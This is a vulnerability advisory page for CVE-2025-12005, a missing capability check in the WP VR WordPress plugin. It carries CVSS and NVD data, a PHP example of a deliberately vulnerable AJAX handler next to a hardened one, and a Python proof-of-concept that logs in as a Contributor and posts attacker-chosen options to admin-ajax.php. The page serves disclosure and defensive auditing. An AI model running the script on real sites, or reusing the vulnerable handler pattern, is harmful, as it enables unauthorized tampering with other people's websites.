Security Vulnerability Report
CVE-2025-12005 CVSS 4.3 MEDIUM

CVE-2025-12005

Published: 2025-10-25 06:15:36
Last Modified: 2026-04-15 00:35:42

Description

The WP VR – 360 Panorama and Free Virtual Tour Builder For WordPress plugin for WordPress is vulnerable to unauthorized access of data in all versions up to, and including, 8.5.41. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor level access and above, to modify sensitive plugin options.
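The bug class the description refers to (CWE-285 in the record below) is a `wp_ajax_*` handler that treats "logged in" as "authorized": WordPress fires `wp_ajax_{action}` for any authenticated user, so a Contributor can reach the handler through `wp-admin/admin-ajax.php` unless the handler itself checks a capability. The following is an added illustration, not code from the WP VR plugin: a hypothetical handler in the vulnerable shape beside a hardened version. The hook, option, script-handle and nonce names (`example_*`) are invented for the example; the plugin's real handler is at the trac links in the references.

```php
<?php
/**
 * Added illustration for CVE-2025-12005 (CWE-285); not WP VR plugin code.
 * All example_* names are hypothetical.
 */

// --- Vulnerable shape ------------------------------------------------------
// wp_ajax_{action} runs for ANY logged-in user, Contributors included.
// Nothing here asks whether this user may change site-wide options.
function example_vulnerable_save_settings() {
    $options = isset( $_POST['options'] ) ? wp_unslash( $_POST['options'] ) : array();
    update_option( 'example_plugin_options', $options ); // attacker-controlled
    wp_send_json_success();
}
add_action( 'wp_ajax_example_vulnerable_save_settings', 'example_vulnerable_save_settings' );

// --- Hardened shape --------------------------------------------------------
function example_hardened_save_settings() {
    // 1. CSRF: the request must carry a nonce minted for this action.
    //    check_ajax_referer() stops the request (HTTP 403, body -1) on failure.
    check_ajax_referer( 'example_save_settings', 'nonce' );

    // 2. Authorization: the check whose absence lets Contributor access suffice.
    //    A nonce is not authorization; any user shown the page can hold one.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( array( 'message' => 'Insufficient permissions.' ), 403 );
    }

    // 3. Validation: store only expected keys with sanitized values,
    //    never the raw array the client posted.
    $raw = ( isset( $_POST['options'] ) && is_array( $_POST['options'] ) )
        ? wp_unslash( $_POST['options'] )
        : array();

    $clean = array(
        'autoplay'  => ! empty( $raw['autoplay'] ) ? 1 : 0,
        'max_width' => isset( $raw['max_width'] ) ? absint( $raw['max_width'] ) : 0,
    );

    update_option( 'example_plugin_options', $clean );
    wp_send_json_success( $clean );
}
add_action( 'wp_ajax_example_hardened_save_settings', 'example_hardened_save_settings' );

// The nonce is minted server-side and handed to the admin page's script
// (handle 'example-admin' assumed registered elsewhere with wp_register_script).
function example_enqueue_settings_nonce() {
    wp_localize_script( 'example-admin', 'exampleSettings', array(
        'ajaxUrl' => admin_url( 'admin-ajax.php' ),
        'nonce'   => wp_create_nonce( 'example_save_settings' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'example_enqueue_settings_nonce' );
```

When auditing a plugin for this class, grep for `add_action( 'wp_ajax_` and confirm each callback calls `current_user_can()` with a capability appropriate to the action (not merely `is_user_logged_in()` or a nonce check). The CVSS vector on this page (PR:L, I:L) matches that reading: low-privilege authenticated access, integrity impact only.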

CVSS Details

CVSS Score
4.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No CPE configuration data is recorded in the NVD entry. Affected product: WP VR plugin for WordPress, all versions up to and including 8.5.41 (i.e. < 8.5.42).

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-12005 PoC - WP VR Plugin Authorization Bypass
# Authentication Required: Contributor or higher role
# Target: WordPress site with WP VR plugin <= 8.5.41
import sys

import requests


def exploit_wpvr_auth_bypass(target_url, username, password, malicious_option):
    """
    Exploits CVE-2025-12005 to modify WP VR plugin options without
    proper authorization check.

    Args:
        target_url: Base URL of WordPress site
        username: WordPress username with contributor+ access
        password: WordPress password
        malicious_option: JSON string with options to modify
    """
    session = requests.Session()

    # Step 1: Login to WordPress
    login_url = f"{target_url}/wp-login.php"
    login_data = {
        'log': username,
        'pwd': password,
        'wp-submit': 'Log In',
        'redirect_to': f"{target_url}/wp-admin/",
        'testcookie': '1',
    }
    session.post(login_url, data=login_data, allow_redirects=True)

    # WordPress names the auth cookie wordpress_logged_in_<hash>, so match
    # on the prefix; an exact key lookup would never succeed.
    if not any(name.startswith('wordpress_logged_in')
               for name in session.cookies.get_dict()):
        print("[-] Login failed")
        return False
    print("[+] Login successful")

    # Step 2: Send malicious AJAX request to update options
    ajax_url = f"{target_url}/wp-admin/admin-ajax.php"
    # Action: wpvr_update_options
    # This endpoint lacks proper capability checks
    exploit_data = {
        'action': 'wpvr_update_options',
        'wpvr_options': malicious_option,  # Malicious configuration
    }
    resp = session.post(ajax_url, data=exploit_data)

    # admin-ajax.php returns 200 even for an unknown action (body "0"),
    # so inspect the body and the stored options rather than trusting the status.
    if resp.status_code == 200:
        print("[+] Exploit sent - check if options were modified")
        print(f"[+] Response: {resp.text}")
        return True
    print(f"[-] Exploit failed with status: {resp.status_code}")
    return False


# Example usage
if __name__ == "__main__":
    if len(sys.argv) < 5:
        print(f"Usage: python {sys.argv[0]} <url> <username> <password> '<json_options>'")
        sys.exit(1)
    target = sys.argv[1]
    user = sys.argv[2]
    pwd = sys.argv[3]
    options = sys.argv[4]
    exploit_wpvr_auth_bypass(target, user, pwd, options)

References

https://plugins.trac.wordpress.org/browser/wpvr/tags/8.5.41/admin/class-wpvr-admin.php#L295
https://plugins.trac.wordpress.org/browser/wpvr/tags/8.5.41/admin/classes/class-wpvr-ajax.php#L467
https://www.wordfence.com/threat-intel/vulnerabilities/id/9bcbc0cf-69e5-4d6e-8987-a0fbbaf41740?source=cve

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-12005", "sourceIdentifier": "[email protected]", "published": "2025-10-25T06:15:35.897", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The WP VR – 360 Panorama and Free Virtual Tour Builder For WordPress plugin for WordPress is vulnerable to unauthorized access of data in all versions up to, and including, 8.5.41. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with contributor level access and above, to modify sensitive plugin options."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-285"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wpvr/tags/8.5.41/admin/class-wpvr-admin.php#L295", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wpvr/tags/8.5.41/admin/classes/class-wpvr-ajax.php#L467", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/9bcbc0cf-69e5-4d6e-8987-a0fbbaf41740?source=cve", "source": "[email protected]"}]}}